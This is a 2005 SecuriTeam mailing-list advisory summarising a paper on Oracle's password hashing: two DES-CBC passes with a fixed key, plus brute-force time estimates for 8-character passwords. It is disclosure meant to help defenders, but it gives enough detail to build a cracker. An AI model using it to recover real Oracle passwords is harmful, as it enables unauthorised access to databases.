From: SecuriTeam <support@securiteam.com.>
To: [email protected]
Date: 15 Nov 2005 12:41:46 +0200
Subject: [NEWS] Oracle Password Hashing Algorithm Assessment
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-Id: <20051115112743.4AF1057BC@mail.tyumen.ru.>
X-Virus-Scanned: antivirus-gw at tyumen.ru
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Oracle Password Hashing Algorithm Assessment
------------------------------------------------------------------------
SUMMARY
In this paper the authors examine the mechanism used in Oracle databases
for protecting users' passwords. The paper explains how to hash is
generated, and shows the feasibility of brute force attack on retrieved
hashes. The paper also lists several practices to help secure the hashes
against bruteforcing.
DETAILS
The Algorithm:
1. Concatenate the username and the password to produce a plaintext
string;
2. Convert the plaintext string to uppercase characters;
3. Convert the plaintext string to multi-byte storage format; ASCII
characters have the
high byte set to 0x00;
4. Encrypt the plaintext string (padded with 0s if necessary to the next
even block length)
using the DES algorithm in cipher block chaining (CBC) mode with a fixed
key value of
0x0123456789ABCDEF;
5. Encrypt the plaintext string again with DES-CBC, but using the last
block of the output
of the previous step (ignoring parity bits) as the encryption key. The
last block of the
output is converted into a printable string to produce the password hash
value.
Dictionary Attack:
Given the weak Oracle password hashing mechanism, it is practical for an
attacker with modern hardware to exhaust all possibilities for a limited
password length to brute-force the password hash. Using a standard Intel
Pentium 4 2.8 GHz workstation with OpenSSL 0.9.8-beta3, the authors
achieved a rate of approximately 830,000 password hashes/second on a
32-byte data block. With a password length of 8 alphanumeric characters
and a known username of 8 characters, an attacker could compute all
possible possible passwords for a particular account in approximately 39.3
days using similar hardware, expecting to successfully recover the
plaintext password in approximately 20 days. This is especially
problematic for organizations with a password expiration duration that is
shorter than 20 days, since it is likely an attacker will be able to
produce the plaintext password before the account password is changed.
The full paper can be found at: <http://www.sans.org/info/911/>;
http://www.sans.org/info/911/
ADDITIONAL INFORMATION
The original article can be found at: <http://www.sans.org/info/911/>;
http://www.sans.org/info/911/
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: [email protected]
In order to subscribe to the mailing list, simply forward this email to: [email protected]
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
